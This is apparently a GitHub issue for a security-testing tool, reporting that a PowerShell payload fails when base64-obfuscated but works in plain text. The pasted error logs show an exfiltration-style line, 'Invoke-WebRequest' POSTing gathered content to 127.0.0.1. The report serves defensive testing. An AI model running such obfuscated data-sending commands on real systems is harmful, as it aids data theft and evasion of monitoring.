Powershell command is not working as expected when using base64 obfuscation #72
Description
Description
Powershell command is not working as expected when using base64 obfuscation.
For the same payload, working as expected in plain text:
MAYBE_PREVENTED {"stdout":"","stderr":"Invoke-WebRequest : Unable to connect to the remote server\r\nAt line:2 char:1\r\n+ Invoke-WebRequest -Uri http://127.0.0.1 -Method POST -Body $content\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n + CategoryInfo : NotSpecified: (:) [Invoke-WebRequest], WebException\r\n + FullyQualifiedErrorId : System.Net.WebException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand\r\n \r\n","exit_code":1}
In base64, another error:
MAYBE_PREVENTED {"stdout":"","stderr":"#< CLIXML\r\n<Objs Version=\"1.1.0.1\" xmlns=\"http://schemas.microsoft.com/powershell/2004/04\"><Obj S=\"progress\" RefId=\"0\"><TN RefId=\"0\"><T>System.Management.Automation.PSCustomObject</T><T>System.Object</T></TN><MS><I64 N=\"SourceId\">1</I64><PR N=\"Record\"><AV>Preparing modules for first use.</AV><AI>0</AI><Nil /><PI>-1</PI><PC>-1</PC><T>Completed</T><SR>-1</SR><SD> </SD></PR></MS></Obj><Obj S=\"progress\" RefId=\"1\"><TNRef RefId=\"0\" /><MS><I64 N=\"SourceId\">1</I64><PR N=\"Record\"><AV>Preparing modules for first use.</AV><AI>0</AI><Nil /><PI>-1</PI><PC>-1</PC><T>Completed</T><SR>-1</SR><SD> </SD></PR></MS></Obj><S S=\"Error\">Invoke-WebRequest : Unable to connect to the remote server_x000D__x000A_</S><S S=\"Error\">At line:2 char:1_x000D__x000A_</S><S S=\"Error\">+ Invoke-WebRequest -Uri http://127.0.0.1 -Method POST -Body $content_x000D__x000A_</S><S S=\"Error\">+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~_x000D__x000A_</S><S S=\"Error\"> + CategoryInfo : NotSpecified: (:) [Invoke-WebRequest], WebException_x000D__x000A_</S><S S=\"Error\"> + FullyQualifiedErrorId : System.Net.WebException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand_x000D__x000A_</S><S S=\"Error\"> _x000D__x000A_</S></Objs>","exit_code":1}